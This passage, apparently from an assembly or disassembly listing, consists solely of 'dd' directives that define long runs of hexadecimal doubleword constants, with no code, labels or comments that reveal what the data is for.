3D458BC1h, 5C5E8ED7h, 3567B8D0h, 3062A4FFh dd 5C9ADBD3h, 4983DB33h, 76A7E769h, 279ECA1Ch, 448FA063h dd 99ED8209h, 9FDF355Eh, 81EC0F5Eh, 0BDC95E58h, 0A9FF1D72h dd 0B9E60D67h, 0B43642B8h, 0F90C4BA3h, 0E52D4790h, 0E53F778Fh dd 0C53F4FA8h, 1F5EACC1h, 3A5B97E6h, 5568AC8h, 5456A2D8h dd 22FDFDC7h, 0B7A99487h, 62F2DCADh, 72FFD892h, 27830B9Eh dd 0C8449263h, 5095D01Fh, 0ECC7856Bh, 0D36DFBCEh, 181C6213h dd 0D8510809h, 3FCEC70Dh, 0D02AF62Ah, 446F32F5h, 0A3476A64h dd 913D1AB7h, 0E2185E80h, 2CF389C0h, 24632232h, 3676AAC7h dd 0B68E21F2h, 0CF0FE4AEh, 0D5FCCA4Dh, 34C1818Bh, 0EBE36AF2h dd 262337E8h, 0D9E0966Fh, 6C958A27h, 0F8897E71h, 0BDFEB6BEh dd 0B1F32643h, 14144277h, 0C6E11A19h, 56EABD55h, 337300C2h dd 76540A29h, 154DE64h, 0D495E517h, 0D780C4EAh, 0B5DF058Eh dd 67D4114Eh, 5C1F4721h, 0A07B8699h, 0CF07CAE2h, 0B3FBD455h dd 44AFD8B9h, 20F3A669h, 7E859837h, 673BE651h, 0FCD58245h dd 0FE32568h, 0D29CB4B8h, 27C20121h, 0FAB47C80h, 0B47CC309h dd 0C8FAB18Ch, 4B6B18E4h, 9CCAAFE9h, 935320C9h, 7B145D1Ch dd 0B2BE7513h, 0E12FC48Eh, 60040726h, 0AB3C329Dh, 0CD80316Eh dd 3CC9F967h, 18DD39F4h, 3E0FAA6Dh, 9324619Eh, 3AF45CD0h dd 354C0B49h, 1CB77A15h, 17549138h, 0E74DE7AEh, 1016562Fh dd 4B0A6A79h, 0B87B1643h, 5391C61Dh, 7AE6AD16h, 11572CE6h dd 5407A11h, 7C174D4Ah, 8EEC1EB9h, 0A3AC1552h, 0B04E1DFEh dd 4C0FD295h, 50EE47D4h, 7F78C66h, 0BC6E23B8h, 4DDF947Bh dd 4082C70Dh, 9138DB1Ch, 0F88D451Bh, 138B76B2h, 0D69848BCh dd 0D055071Dh, 0C8631B11h, 0E17F4205h, 0AB4CDB78h, 5B0D2ADBh dd 83518B6Ch, 0DE1F12E3h, 80672604h, 0B0B4FA97h, 0EDEC88BDh dd 5C29F9F5h, 0D5D4F654h, 4431D1DFh, 38D1BEA5h, 36857128h dd 20EA4E31h, 565A9A5Dh, 0C1352430h, 957C7230h, 0C68F3EACh dd 0EC236F2Dh, 4D121C29h, 0CCB96E5Dh, 9540A4FEh, 0B4773A15h dd 45EA73F1h, 9C69397Ch, 0AC1F8B52h, 0F8C40AFBh, 773BF6E5h dd 6C2F4B31h, 68CF67A9h, 17DA9Fh, 480ACAF9h, 0BE6A3D85h dd 0BBF38042h, 632791h, 18DB9F65h, 0E4CFF805h, 0C3864Dh dd 0F4E5286Bh, 963E9166h, 0EF9F541Eh, 0D404DBD0h, 95874A0Ch dd 0E9795450h, 0AC07339Fh, 0F22326E9h, 0AF1D8F22h, 0DDD0EE7h dd 2C647633h, 71379EEDh, 9B70EAADh, 5A3BFA15h, 0D9F0D295h dd 4035FAA3h, 40373F24h, 78FF4D67h, 1CB576EEh, 4684C70Bh dd 3F051FB2h, 7DE27E77h, 0BA7F07F5h, 0DB8DF3D6h, 831A5A2Bh dd 0A2DC1C55h, 2BF21A41h, 0B07337FDh, 0CEA71946h, 33A847F1h dd 0DC1F4285h, 0D2135699h, 4F656F42h, 0ACAAEE87h, 5C1FE0ADh dd 5837A266h, 781D5F72h, 0C7A8BEB7h, 1AD3A8E0h, 2421FB69h dd 1EE91A5Dh, 838D8F24h, 0CAAAFAC8h, 7DAA9539h, 0D2B76AB8h dd 8E4A5D21h, 0C0B80EAh, 0C19CCE06h, 30783AFDh, 0A86B2FE1h dd 0E9651C65h, 0AED350C9h, 85C305CDh, 0F83BFEC0h, 9D5AD28Bh dd 301D67EFh, 215094D4h, 8EC445D3h, 17B0C3C3h, 3099E7B7h dd 0DBB4FC3Ch, 2EE78CF4h, 0CDF4CB55h, 1C0346h, 713A7A3Dh dd 0E89D70B9h, 0D0F7624Fh, 80935619h, 0D612B55Eh, 857B083Dh dd 0AC6F32F9h, 0A0DCA3E6h, 25BE1ADDh, 94B0ED1h, 356D52FBh dd 0D5B6F9EFh, 0E727EAADh, 64B7D667h, 0D58BDD98h, 7C03C689h dd 9804CF5Dh, 0ADE4944Dh, 1CDFA2E9h, 30F39BF4h, 25FAAA6Dh dd 8DCF1B26h, 0CC93DE4Ah, 9E221A5Ch, 0A0FF7AE2h, 49FA3B65h dd 860F417Bh, 0D80619D6h, 0A4986D2Bh, 88E12FEEh, 7B4F12F2h dd 15BC542Bh, 7401C10Fh, 387B2E82h, 55F7B2F5h, 1413D699h dd 2869BDE2h, 389FDFEEh, 10CD278Ah, 0E066A65Fh, 0DDE4AC29h dd 34870BD8h, 94EE8273h, 70B37439h, 0B4F13B7Ch, 0E4BDCBDEh dd 59025223h, 0C0B55D9Ah, 0E0BE09ADh, 0F9397EA0h, 0C6CADDB4h dd 175320E2h, 11B82EC9h, 780DC5EFh, 0E1AF314Dh, 6015F3C2h dd 3ED4239Ch, 0B70AA490h, 388C3DB6h, 0F076A386h, 0FFD4F019h dd 13684EEAh, 81F3C256h, 36DE31FCh, 0F80DF13Dh, 63AB6E30h dd 0DC9E6AAFh, 0FB6B5519h, 0F0C2AC6h, 0CC1A98F2h, 598D75F0h dd 67E00802h, 58DC49D2h, 0D89F8586h, 2D7F6891h, 8FCC9CEBh dd 521C0438h, 3A9655A1h, 0CF0FE4AEh, 8F28CA4Dh, 0F3F053FEh dd 0C0EBC476h, 1F902B65h, 569CC59Ah, 5686DD19h, 91F62204h dd 9FC00056h, 0BCD70046h, 0B0F9334Ah, 94F8397Eh, 0CE0D3746h dd 0E607589Ch, 0CD145888h, 0DD07708Eh, 0E32362ADh, 803163BBh dd 13459BE9h, 7639AD4h, 5E1F96D6h, 5043D699h, 2D07CA8Dh dd 169FDDF3h, 4A8ADB0Fh, 208FD647h, 5F94D313h, 6DACE971h dd 9FDCE820h, 0A3E67C54h, 91873868h, 96D2116Bh, 0A5F97435h dd 0CAF6327Bh, 0B477D2A8h, 29362EF1h, 0AA41B808h, 0FBD6D0D9h dd 84473CD8h, 43BD6B3Eh, 84EEF283h, 0A1F92B6h, 6AA25183h dd 110BF8AAh, 49D1FE29h, 0E72D053h, 792B792h, 249923ECh dd 7A449263h, 6666D14Bh, 4332F798h, 67AB5806h, 0EAA8BFA0h dd 961AAC19h, 3AC9C6F7h, 5A7A8FFAh, 443FD93Ah, 5F9CDDC1h dd 9C73665Eh, 600F7BD5h, 7C3F02CDh, 5E70B0EAh, 646BA6E9h dd 63894B5Eh, 8C04D2A3h, 2A90CBFDh, 0A108E97Fh, 28DD954Bh dd 0F44C729Ah, 0EF2C68C7h, 4C781A5h, 0BBFD2D41h, 0C2FC3D6Ah dd 0E0EF2A6Dh, 0EF05CFE2h, 4B634E27h, 5480BDFBh, 4F8CC0F0h dd 0B6B5A712h, 51681ED7h, 0B3A39758h, 0D11206FFh, 2567ABECh dd 0FDD4BFE0h, 5C29D92Bh, 5013DD71h, 1549F8Dh, 16C98DD3h dd 2CA3FE31h, 1B713396h, 1E3F9A6Bh, 7FCB8E51h, 95CDF236h dd 0B1D50257h, 71583A2Dh, 0D8AD651Bh, 0F7CDD79Ch, 0F18C463Fh dd 0AD06B770h, 2DE22EC7h, 9C691EADh, 2C6E988h, 17473CF6h dd 783BFAA9h, 129A7FB5h, 3923D0B0h, 68396710h, 81E3CEA7h dd 5A003D70h, 2E9233BEh, 74E7AA5Bh, 6B83BE2h, 81CF9263h dd 36DDA7DCh, 9EE32A3Dh, 0BAAB0430h, 0DC9F604Dh, 0E206A999h dd 41877C31h, 9A0E64C1h, 0B23BBF78h, 0CA3126DFh, 0F5E297DBh dd 0DC4B38CFh, 2D6F5293h, 46A609EBh, 3C27DC91h, 64354B5Eh dd 0C9C9D2A3h, 4035F8C6h, 34FB527Dh, 7BBCAE71h, 2F94E12Ah dd 5C97B86Bh, 91388A01h, 0F88D45D3h, 0ECA81AA6h, 552E6629h dd 0D4A142C8h, 3636C348h, 547F743Eh, 4F8CC3BDh, 0A4672605h dd 0D61249E1h, 0D80A5C9Ch, 0CC0F42E7h, 0E6A205BDh, 0ED2BD88Ah dd 699BED65h, 0C313D69Bh, 4407CFE5h, 2B4E3381h, 75EF846Ch dd 1CF91BE4h, 193F9A6Bh, 8B3471A4h, 0CA839CF8h, 74BC7639h dd 0E4A7683Dh, 0D90BB2A0h, 0A4DB5215h, 0C0834708h, 8F89AF02h dd 6CEA2EC7h, 9C5F2375h, 0FA879D89h, 11B858CDh, 780DC2DFh dd 19763230h, 73AB8EA4h, 0C1E8DA9Dh, 483DF523h, 817C206Eh dd 30C5A81Ah, 0A9CEDF6Dh, 2EC5F9E4h, 9930C255h, 0F5BA43h dd 70B8BAB8h, 0E8AB6FB8h, 579322AEh, 5FA3A919h, 0F2992988h dd 0F7FEF801h, 0AD6F04CBh dd 0A1092683h, 1A818B7h, 887D32C7h, 73C0FA46h, 7032963Dh dd 0F1AA79ADh, 582DC0FEh, 1F5DC2FFh, 7C055376h, 0F472BA4Bh dd 29AB2B7Eh, 0A152A265h, 10E58820h, 472F82FCh, 904481BBh dd 0ECAF72A1h, 69454D77h, 2BC37E29h, 0FEB0C484h, 3BC2CF05h dd 17300E7h, 5E43C2ECh, 0DD6E11Eh, 8C790CA1h, 942B06A3h dd 2637FABDh, 7ABE11E2h, 0D11FD499h, 0DD07F2DDh, 72382618h dd 8EF4EE81h, 8AB397Fh, 2803677Dh, 6D6D05Fh, 42D98C1Bh dd 0D8FB8946h, 0FF52F631h, 0B5AF8AECh, 0C8BF1A2Ah, 41DF60EAh dd 0F6BF16B4h, 0B46BD2FDh, 864E2EF1h, 0B27F5AD3h, 0AA7338F9h dd 0AA622FE8h, 1E86F9h, 665CD795h, 2E6AA9E3h, 0AB40DABDh dd 7E308C04h, 903B4385h, 5AF3B679h, 77B0FA6Dh, 24C90B9Eh dd 81449263h, 0F593CDh, 0EF547A57h, 0B9A6A75Ah, 0DC9F67CDh dd 0B4B67019h, 3BD04A07h, 8E407C94h, 0A0ABB1F5h, 0C868CDB9h dd 94571ADAh, 96C6B35Ch, 2F6802F3h, 4C216346h, 0A4A2EA9Bh dd 0ED968ADFh, 4C39EEC5h, 5587630Ah, 0B9F7BA4Bh, 1ED5E1FCh dd 76118965h, 4385C759h, 38C91FB2h, 387E77h, 7D800C35h dd 552E98A2h, 0D4A1664Dh, 667943A1h, 541F5270h, 4F8CCCC8h dd 4770588Ch, 992C93E8h, 43C4F83Eh, 3DCEC8E2h, 7401C6EDh dd 9FAC4A42h, 0A34C5B4Eh, 662FD40Ch, 2FBA4A8Dh, 39FB8894h dd 1C879801h, 0DFE3A61Ch, 22EC28C8h, 47760E51h, 0FCBFB47Bh dd 7574674Dh, 0E491744Eh, 0D89B5E21h, 0F2C0D7D3h, 2983463Fh dd 4B88C4F5h, 0BD1FAB36h, 9C5F22D3h, 520E96D9h, 8E4A0AC9h dd 1755DE8Eh, 30F9CDAh, 94FC6CFh, 7436BFFBh, 217FEEDEh dd 48DFA7E8h, 55909616h, 5685CF01h, 39BEEA00h, 2CEF9858h dd 4FE3A669h, 99C2091Dh, 0C8D90B5Ch, 0B8ED0342h, 0DDB2387Ch dd 0A8E21807h, 0D40F5064h, 0C01C4190h, 0C10B0690h, 0B42E6AADh dd 0A82F60B0h, 194F7AA0h, 1E5282DAh, 1707C6D9h, 3C75BFD5h dd 7668BCFCh, 4A0EEBA9h, 5783DB2Ah, 4F85C719h, 70B3C345h dd 69B2F279h, 60A9EB6Dh, 9FD21061h, 0CC83065Dh, 0C0D1094Fh dd 0B1FE287Bh, 0E8F82A7Fh, 0DD08624Ch, 0BD494290h, 0C10F7DE7h dd 0F97B7B93h, 0F56F77A7h, 0A06F73A6h, 115E88DBh, 57588ADFh dd 3170A185h, 1933F7FCh, 376EEAF9h, 5592CAA1h, 65CF9310h dd 90811Dh, 71A3FB31h, 0AEDFA770h, 3B3B8655h, 0B0B26209h dd 0DF5ABA90h, 73C2096Bh, 0A872C02Fh, 4508DFD0h, 83257226h dd 0FAD9C6B1h, 0F2B01266h, 0A53D33B9h, 0ED9A7B6Ch, 783BFE1Ah dd 6C2FF2B5h, 6023E6A9h, 5417DA9Dh, 480BCE91h, 3CFFC285h dd 30F3B679h, 24E7AA6Dh, 18DB9E61h, 0CCF9255h, 0C38649h dd 0F4B77A3Dh, 0E8AB6E31h, 0DC9F6225h, 0D0935619h, 0C4874A0Dh dd 0B87B3E01h, 0AC6F32F5h, 0A06326E9h, 94571ADDh, 2DC86ED1h dd 7C093D79h, 0B09675B9h, 6427DC92h, 4C5869AEh, 43178118h dd 43058D3Eh, 10B331ADh, 24A98555h, 5EE4BB17h, 9BC7E551h dd 46EC9E0Fh, 442EF74Dh, 65AF440Ah, 0D69CA6ACh, 5792B11Dh dd 116966D3h, 0BC7B8064h, 943FB371h, 0C08F2ADBh, 0F05B1EE1h dd 8C4F12F5h, 0A33A8344h, 4D6EFA8Bh, 0EB279AA9h, 0ABFDE665h dd 6F8F5366h, 0B3C4CABBh, 7476BD58h, 0CFEF8451h, 0DC935979h dd 0FC549AD2h, 813D6C55h, 0CA9CFBD8h, 0F089F539h, 0D68C6F59h dd 558B2C22h, 97D7AE5Bh, 0C0B9C557h, 86883E89h, 0DA942D1Ah dd 6308CAF5h, 5E78E926h, 0BB8787E6h, 7B63FEF7h, 0E3ECC6FEh dd 561C462Ch, 0C8921D9Dh, 480BF8AEh, 0D4FFC285h, 30F3B645h dd 1B7B2FE6h, 0A8339E57h, 0E4306DA3h, 0C38651h, 0CB2BC7BEh dd 9DAB6E07h, 2902EB2Dh, 3B93603Ah, 580AB591h, 7B7B083Eh dd 93CFB77Ah, 35EA26DFh, 94612541h, 884B0D39h, 0BFF631C5h dd 70B36532h, 8C75EAADh, 0A7E4204Ch, 73CF4796h, 9600C6BFh dd 34FBC0FEh, 29EC2A7Eh, 665CA265h, 94DC9649h, 4C78AB0h dd 0A8B73CCAh, 1351BADDh, 202665D6h, 0D7976C22h, 0C0011ED7h dd 0C87FBB85h, 9E8AB6E0h, 4F272999h, 99139510h, 5390F354h dd 79C2D916h, 747BB6F9h, 437202C4h, 0A6E6616Dh, 50A45996h dd 0C561CA8Dh, 0AC840F9h, 2C44377Ah, 0A3B5A669h, 11A29A67h dd 0E3DBC4DAh, 0FFB50947h, 825B27C8h, 0E75895D3h, 0EEA49E94h dd 0C0AFF15h, 448CBD71h, 0B4773A79h, 97AB9B0Eh, 740F22D3h dd 6FACE88Ch, 0BB878FCEh, 0FDB4FEF7h, 6C19CD75h, 3307E2AAh dd 67151A1Eh, 40BDC14Ah, 0F57FD066h, 1432E559h, 38CEAE49h dd 3CD7B745h, 0E524D20Eh, 0D7CC7DC8h, 0CAC3A786h, 0AD0395B0h dd 0EAEBB94Bh, 0EBCAAD98h, 0EAF3B5ACh, 9AADC580h, 8A1B9E40h dd 49F0DD68h, 8A23E985h, 6136F550h, 6A4BF19Dh, 4F750D38h dd 6A530B88h, 672B2520h, 4A7B33B0h, 7FA35376h, 0DDACBA4Bh dd 0D7145100h, 81D213Bh, 0EF2D79B0h, 6EC449B2h, 0A8532645h dd 64508DC0h, 0D68540BCh, 0E52F3C1Dh, 8694C09h, 5E7D41E1h dd 0B6199D9Fh, 5152C2B5h, 5AD8E11Eh, 0E69E95DDh, 0A8AB5ECCh dd 0F4C80548h, 6358ED4Bh, 0D91DB215h, 5025F0BFh, 2E202127h dd 0B851E6E9h, 349AB18Fh, 280BB7D9h, 0AC2865A8h, 8CB8E50h dd 0F1CB50C1h, 3A4D96E8h, 0E14C9CC6h, 0D89B5E99h, 736DF995h dd 5816CBCAh, 9F770CC5h, 6BB1D926h, 0A4D4A712h, 905316EFh dd 114802CDh, 73DB3F01h, 54A67743h, 1522E69Fh, 0DD1ABC9Bh dd 0BE1825B4h, 0AC74B00h, 3686B479h, 1D6A70Bh, 15BD9A8Ah dd 0A7A9B754h, 0FF3C3AA1h, 0C0F4F1C2h, 0D71FFBB8h, 1F346213h dd 0E818D3EEh, 0C4874A3Bh, 2D743601h, 6D33635h, 5F9CBA01h dd 2CC29322h, 7E4B38EEh, 4A078B40h, 7446F7B9h, 66CCDBA2h dd 9BB01E8Ah, 74845762h, 4003C6BFh, 1383B27Dh, 106E2BFBh dd 0FC1EA253h, 9BDEF052h, 0B46CEC08h, 7D31D4B9h, 0EC994AB0h dd 0E5B886E8h, 0D21E3E7Ah, 0AE4B7DBAh, 46DA9AEh, 0B076B99Dh dd 21E2A046h, 9C5B28D9h, 94AFD38Dh, 7CF3C562h, 0CC51DA56h dd 0C34DEE5Ah, 5875FB4Eh, 0A40A3EC1h, 408A3572h, 301B7F53h dd 0EC66B713h, 23080D0Fh, 7E7D0AEDh, 823D653h, 78407DB1h dd 9A8102EBh, 104F3225h, 2664A1D2h, 0B84C20DFh, 0B449B8CCh dd 0C0BDC434h, 0DCA1D02Ah, 0E895DCE9h, 0E499E8D5h, 6FBEBAC1h dd 93C64E0Ch, 87DA427Ch, 8BDB566Ch, 0E99A195Ch, 483DF609h dd 4744772h, 30F3B64Fh, 27932A6Dh, 0EF71FED1h, 3AF719D0h dd 0C38649h, 4CB00E35h, 0E847E564h, 59682D8Eh, 0D0A56E92h dd 0C5874A0Eh, 0B8ACBA0Eh, 44DF32F5h, 1DEA8D43h, 94612579h dd 23E1E661h, 4397BF4Ch, 0F5C4F68Fh, 6411D226h, 581BDEA2h dd 0C9F8C7E1h, 4035FE02h, 35F7BA7Dh, 0E903AB05h, 0AC205D9Bh dd 9B783CB0h, 32F82EC8h, 0D374F541h, 4012FBFDh, 69A35016h dd 0B32FA655h, 63BDB175h, 17198236h, 88F8B30Eh, 0A4642ADBh dd 962F1EE1h, 0B4C69723h, 0F4C306FFh, 8A7512B8h, 0F93114Eh dd 0F7396BC1h, 0FB7516AAh, 7C8C4F7Ah, 38F8BEB7h, 799BB275h dd 186A239Fh, 61579A6Bh, 0F6D56654h, 58577DBAh, 404C89C4h dd 1F11820Dh, 0E178A1DEh, 0D970EA73h, 6B12ED6Fh, 8CFCAF76h dd 7A9C2EC7h, 9C5CE012h, 842616D9h, 7BBA7425h, 90244E3Eh dd 93D00925h, 75DC5ECFh, 0FF8671FBh, 0CD80011Ah, 3CC9FD29h dd 787A7E52h, 0AF625D91h, 1BDBA859h, 78CF9255h, 8B467167h dd 0F4B74C05h, 9CAD6E31h, 571A9507h, 0D0936021h, 0B1864A0Dh dd 4589D604h, 2998CD0Ah dd 0A0551E62h, 90571ADDh, 85A30BA5h, 8BC0FD3Bh, 460B7D3Ch dd 6427EEADh, 0B00CAAA1h, 0B3F02CF2h, 0BEC3EF31h, 3C4F11B5h dd 83EFDAB1h, 0F727D7DDh, 95243D3Eh, 4F1B2C6h, 0F8BB7E49h dd 512F3D40h, 0E0955EA0h, 3CD12E1Dh, 3774B02Ah, 95676BBDh dd 35D63C30h, 64671CD5h, 3D511D05h, 8C792A50h, 2AF2B662h dd 4CBE7F37h, 0D881EE87h, 0D99AE8E5h, 0FA13E0A1h, 0B9E572EBh dd 703B76h, 2CFFB243h, 2797A669h, 727DD3EDh, 6E37FBE9h dd 565732EEh, 7918B60Ah, 0D298FA90h, 531EA921h, 0EC8F642Dh dd 0B5834609h, 0BE2F8AF4h, 9E53AD74h, 243988E5h, 15A4D658h dd 84713246h, 783BFE81h, 0A8AFF1C1h, 0E386EC81h, 3217ECA5h dd 0DCB6473Ah, 97FFF4BAh, 878338Eh, 24E7AA5Bh, 11AEDE61h dd 89CDC2E5h, 0F5BECAh, 7F328D97h, 68AB5809h, 0A99F6225h dd 0DA2BE612h, 0F2BFCE88h, 85909401h, 0B45E8A93h, 98E8A31Eh dd 95571AEBh, 8A3F0ED1h, 0D9352B75h, 7005CE3Dh, 6E240E6Dh dd 6E235A04h, 2AA4B495h, 0B7F34731h, 2CF31F8h, 28E9AE71h dd 0A8DDD765h, 94769C91h, 62C7BC75h, 4806F7EAh, 54AF440Ah dd 0E0A34EB1h, 5F12ADB6h, 0C08B7829h, 0C87F4205h, 4D42DE88h dd 2190D512h, 986D266Ah, 8C4F16D5h, 38F30DBCh, 4CB27FB7h dd 8381EE87h, 0D79A15E8h, 5013E0A1h, 3107CA85h, 0BB43D890h dd 0A94AB895h, 46E39051h, 0BE17A9F6h, 0B0AD9BBAh, 59B59A6Ch dd 0F0854EBCh, 0EEA48EEDh, 0EEA3DB84h, 3B243415h, 0F6BBCD8Ch dd 0B4673AFDh, 29D348F1h, 1C5C5625h, 35591E1Dh, 84713248h dd 0CE3455A7h, 5A177B30h, 0A0CB4DA9h, 0A3E82561h, 7E334514h dd 3CFFC285h, 80FAC239h, 0A762A83Dh, 0B2DBA859h, 344417A2h dd 20C3867Fh, 72077A3Dh, 0ECAF6C44h, 56612DA8h, 0E6ABD5BCh dd 5C0AC30Dh, 0DE7B083Eh, 0A993B25Eh, 0A0D3219Ch, 0D4A8555Dh dd 7432E67Bh, 0F9C8FD3Ah, 7005CE32h, 6427AAADh, 697D66C7h dd 65BBD0E0h, 58B36DEFh, 0C723F77h, 0C82BAE47h, 48370866h dd 0A02C69A5h, 8F427DC5h, 0F8BB4879h, 99AF72B5h, 6A25D62Bh dd 0E2AFD9B8h, 48202811h, 0BB0A47F9h, 0FFF33649h, 4CCD6A12h dd 67A4E2CAh, 0B4C49722h, 804306FFh, 7F42FABCh, 0ED21AE01h dd 5C29DA26h, 361C3D33h, 4EC74935h, 0EC33D24h, 9C44D475h dd 0A5140C68h, 14E1A2D6h, 8C98E51h, 7948AD30h, 0F0854EB2h dd 0E4A36A2Dh, 182B4454h, 0F40AD71Fh, 6509463Fh, 0B4410277h dd 0CE7BCE30h, 37DE445Dh, 98B81669h, 14D4A7Dh, 780DC644h dd 0E7AA051Fh, 6023D091h, 2117D29Dh, 0CBB3A881h, 0B85AC86Dh dd 56F38041h, 0CFE61AC6h, 12932E69h, 3AF716D0h, 85342C49h dd 0F48142B6h, 0E8BB6E31h, 0F9EA1794h, 2810EE7Fh, 0FC03EF07h dd 131D3E37h, 85C5F2C6h, 965CBE54h, 1FD2EDDDh, 884B38E9h dd 93F22C5h, 9B4447A6h, 6D9F8CB6h, 0DCBED4B9h, 8C0FE4ADh dd 0E509C56Dh, 34C182F9h, 95C20517h, 1CE99DFDh, 0B55957D3h dd 4F1B5D5h, 0A00BD527h, 0D42CF737h, 1709661Fh, 0E2AFD198h dd 0C88B4D11h, 4B5D3604h, 864BBD7Ch, 0A4672AEDh, 6F4D6BE5h dd 0BA779950h, 804306C9h, 9C328FBEh, 97D41435h, 0A3E5494Dh dd 0DB962166h, 4407FCB5h, 4CF3BE81h, 86260276h, 1868239Eh dd 14D79A6Bh, 28BF0E51h, 799585F5h, 0F0854EBAh, 0E9BD8AECh dd 0D8BF56A8h, 0F40CF717h, 2443463Fh, 0B0B3BAFEh, 20A9E5Ah dd 7CA09A83h, 0A8D0B3D3h, 2F210AFBh, 40B07B36h, 6C0FF283h dd 3357E6A9h, 6C9C5F6Ah, 480BCEA7h, 318BE285h, 30F0718Eh dd 2193AA6Dh, 0F3710ED1h, 870819A6h, 36FC16C4h, 7D76513Dh dd 0B01B9270h, 0E41CE72Fh, 2739562Fh, 0F2BFC188h, 0F87B3E01h dd 0CA6346F5h, 0AAA07651h, 0A26F9958h, 0EE41E5D1h, 76DFFD7Dh dd 460B751Ch, 938C8CADh, 6E235524h, 4C0FD195h, 0B770B288h dd 2CF31F8h, 28EBAE71h, 0EBD2D645h, 10D3959Eh, 0B4C2FE4Dh dd 0B50D4D1h, 6924BDBEh, 0E0955981h, 9C1E9236h, 3F427DEDh dd 8A47C980h, 307336F9h, 29695FEDh, 0AE639D64h, 0CC4798D5h dd 0F340FF49h, 0B9337745h, 683BCAF5h, 0EC170264h, 56F07D12h dd 843672EBh, 809D15E7h, 948732FAh, 22E3A669h, 4C7CFCBCh dd 7D020BFAh, 0CD07E443h, 401810F9h, 612AC0EEh, 0D8AD66B9h dd 0F404D7E2h, 0C083463Fh, 0B2022AFDh, 0F09305A6h, 0CFD43B0Eh dd 0BBAB3DF1h, 34CA811Dh, 793BC8FEh, 5A106220h, 0EB1AE7A9h dd 0DD13FED9h, 7E1BA62Ch, 0A8424985h, 1BF38046h, 12D83AE8h dd 935E6961h, 4CCFA46Dh, 74C38649h, 5F6F8D3Fh, 0BEAB6AF3h dd 1422E172h, 0D0936026h, 0C55ECE02h, 0B5933E01h, 0E76F32F5h dd 0E52D74ACh, 0BA652991h, 88074295h, 4745973Ah, 0F5BAF68Fh dd 6411D571h, 644355F2h, 3FF00A96h, 74404DA1h, 0CB025A95h dd 947E258Eh, 47DF945Ah, 99DFD45Ah, 32F86AC8h, 0F0F97D41h dd 0D34BF7BCh, 9328661Fh, 5424A535h, 208B4E11h, 4380B7BCh dd 8FCF8B72h, 4C312ADBh, 67A4EB4Ch, 0B3F3875Eh, 0CAC806FFh dd 787DF9B5h, 81A8209Ah, 3C97EDA0h, 5F13D698h, 44069009h dd 0F84EBD81h, 2FEF844Ah, 16DC26DCh, 0FCEB365Dh, 8690B5Eh dd 0BA328245h, 70365D3Dh, 0E7A75C12h, 0B2730E27h, 4F70ADE0h dd 0F6BCFAB4h, 0BF023AFDh, 0A76769CAh, 9C5E3966h, 0A95FFDD9h dd 0B278B658h, 75BEF1C1h, 6F2FF2B4h, 561C662Ch, 6C96BC9Dh dd 0CD04EB6Eh, 3CFFC279h, 1BF1F6F2h, 0CCB79E2Eh, 0E7246B4Ch dd 33732F6Ch, 85CC867Fh, 0F4B77AD9h, 0D76BEB32h, 599C6213h dd 0D0A56999h, 83AC4A86h, 75F9310Dh, 976F32F5h, 236C2EAEh dd 94571A19h, 8B49CE52h, 0F93C1682h, 7005C939h, 0D1D8BAFFh dd 582DE17Dh, 7735476Ah, 0C559C6BFh, 8372B5BDh, 0C1EBAE71h dd 1CDFA2F9h, 95DC6965h, 4C78AD9h, 0F7AE40C1h, 0ECAFF9B0h dd 0E1E5ED29h, 84A31936h, 377FF2F9h, 0C27BFAh, 0C57300C6h dd 64E2299Ah, 9B5B28DEh, 0BA709250h, 68C68FC9h, 0FF37CC82h dd 88AED5B1h, 2E1FD49Ah, 0B496ED91h, 3607FCB2h, 38FB83E8h dd 1B9DC275h, 20E3B981h, 0E899175Dh, 0AE04FDAh, 0C7AFC046h dd 0C68C9EBCh, 67AB1F2Dh, 0E9644EE5h, 0D0AB169Ah, 398AD68h dd 8BD7BF72h, 230B2EC7h, 0AA60A250h, 6509FED9h, 2D26F532h dd 0F83BFEC1h, 2B04FCC0h, 5B2A94A5h, 0D618D2DAh, 0B7F431ADh dd 8E7ACDCCh, 0BB0C4987h, 83668E51h, 18DBB6EAh, 73306DAAh dd 4A42C4A2h, 0F4B71A19h, 289820D1h, 5BBB6EAEh, 0E6AC9E9Ch dd 2C30Dh, 357B083Eh, 0AC47BD4Ch, 20E625E9h, 0F2572CE2h dd 0A305AB74h, 687D0103h, 0B63FB492h, 0A3CF11EBh, 581B8D20h dd 4C0FD795h, 0BC454F89h, 6334E422h, 136D3B8Eh, 0F41EA253h dd 0A569946h, 54C78A4Ch, 92931415h, 0A3A8DCAh, 65A35012h dd 5C9805DDh, 0C88B4F14h, 439A18EDh, 0B062DE06h, 0C1342AEDh dd 0F4325895h, 0EF2A41B0h, 0F42A74BCh, 8B37BBC4h, 5E14BA04h dd 668A1DA5h, 0D913E0A2h, 72389608h, 38E25681h, 49BCB275h dd 4588C73Dh, 71B9ED12h, 61A3FD23h, 95CDD235h, 95DF1F4Fh dd 0B3A70F4Ah, 277275C9h, 0CC9CBAEAh, 0A5D04609h, 0C0045FAFh dd 0F80E5C9Eh, 0F5294B97h, 0F53473B5h, 89AF5DCDh, 90C40128h dd 6C2FF2A7h, 16183FAh, 2462B1FEh, 3E62BCC1h, 5B9AAEECh dd 0D8A4B61Ch, 0DB18429Dh, 18DB8689h, 4FAAC155h, 67ADE721h dd 80D83458h, 0B8D20858h, 0B5E90B57h, 0B5F43375h, 96F1D0Dh dd 0E884C1E9h, 34EABFA1h dd 0CA6310D3h, 953D4AB9h, 7ADEF186h, 0F53F34FEh, 0E5CCD285h dd 6411D183h, 0E5961E8Bh, 4C39ECC5h, 0BF5396D9h, 2CD22C8h dd 28EAC671h, 768BA261h, 852CC158h, 4F1B511h, 0AFBF1415h dd 0D3F3E7CAh, 2420661Fh, 8022A509h, 378B782Eh, 8A442890h dd 3DB069F9h, 92597A58h, 0DA448E1h, 8C7929BBh, 8FBCFE4Ah dd 74374139h, 8AE67B1h, 361FD49Ah, 0C5EC8099h, 4431F127h dd 0BCF47E04h, 2CEFB2D1h, 70B36642h, 7E879937h, 8CBE650h dd 3E94245h, 0C6883CACh, 1B5FE92Dh, 0DD73DA2Eh, 49065215h dd 0C0B5796Dh, 8B1FB770h, 3DE62EC7h, 9C691D95h, 90394488h dd 0F2D2F59Dh, 0FB3BC8FAh, 0E8200D4Dh, 6023E31Fh, 0E1E8DAF7h dd 483DF1F5h, 78D577Ah, 0C870B64Fh, 0BB63A592h, 91DB9E64h dd 3AF0EAD0h, 30AB549h, 0A5E72BFEh, 17FA6A5Bh, 0EAA00690h dd 9E06A919h, 41877C36h, 0C3FF31C1h, 9F6F32F0h, 0DCE6AF20h dd 0C5572CE2h, 97235F80h, 2C3F0DC5h, 4BA56346h, 0A4A2EA9Bh 